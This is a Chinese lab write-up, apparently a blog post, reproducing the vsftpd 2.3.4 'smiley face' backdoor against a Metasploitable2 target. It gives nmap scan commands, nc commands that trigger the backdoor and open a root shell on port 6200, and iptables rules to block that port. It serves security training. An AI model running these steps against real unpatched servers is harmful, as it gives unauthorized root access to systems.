Ftp笑脸漏洞复现(后门漏洞)

目录

漏洞简介:

   这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞

实验环境:

实验准备

实验过程

小总结


 

漏洞简介:

   这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞

实验环境:

攻击机:kali  虚拟机            靶机:Metasplotable2-Linux

虚拟机的网络连接都选择 NAT模式

实验准备

①nmap命令扫描找出同网段下靶机的IP(我只开了两个虚拟机,所以我nmap出来的两个ip除了主机就是靶机,其目的最终只是要找到靶机ip,可以有多种途径)

nmap 192.xxx.xxx.0/24   (这里192.xxx.xxx是网段,即IP192.xxx.xxx.xxx的前三部分,该命令用来扫描相同网段下存活的主机)

 得到靶机ip并发现打开着21ftp服务端口

②获取版本号

nmap -sV 靶机的ip地址

发现是21端口那里使用的ftp服务是 vsftpd 2.3.4版本,所以知道靶机有笑脸漏洞

实验过程

 
kali终端依次输入命令:nc 目标靶机ip地址 21

                 user a:) 	(用户名必须带笑脸即 ":)" )
                 pass 1111 	(密码随意)

② 开启一个新的kali窗口输入下面命令

namp -p 6200 目标靶机的ip地址

在①操作登陆前和登陆后6200端口开放的情况

 

 

 

③输入命令连接6200端口后门

nc 目标靶机ip 6200

 

如上就是连接上6200端口,证明漏洞复现成功了,就是靶机的root管理员了,相当于利用漏洞获取了靶机管理权

小总结

一些服务的版本的更新换代是解决已发现的一些漏洞来提高安全保障,像这个带有vsftpd 2.3.4版本的服务器的21端口就已经是很久远的漏洞了,早已被修复,只能用来做训练,但我们要知道的是我们要及时更新

②一些防范后门措施

安全配置

防火墙 (解决后门)

iptables -A INPUT -p tcp -dport 6200 -j DROP
建立入站规则,不能从6200号端口进来
iptables -A OUTPUT -p tcp sport 6200 -j DROP
建立出站规则,不能从6200号端口出去

 

 

  • 4
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值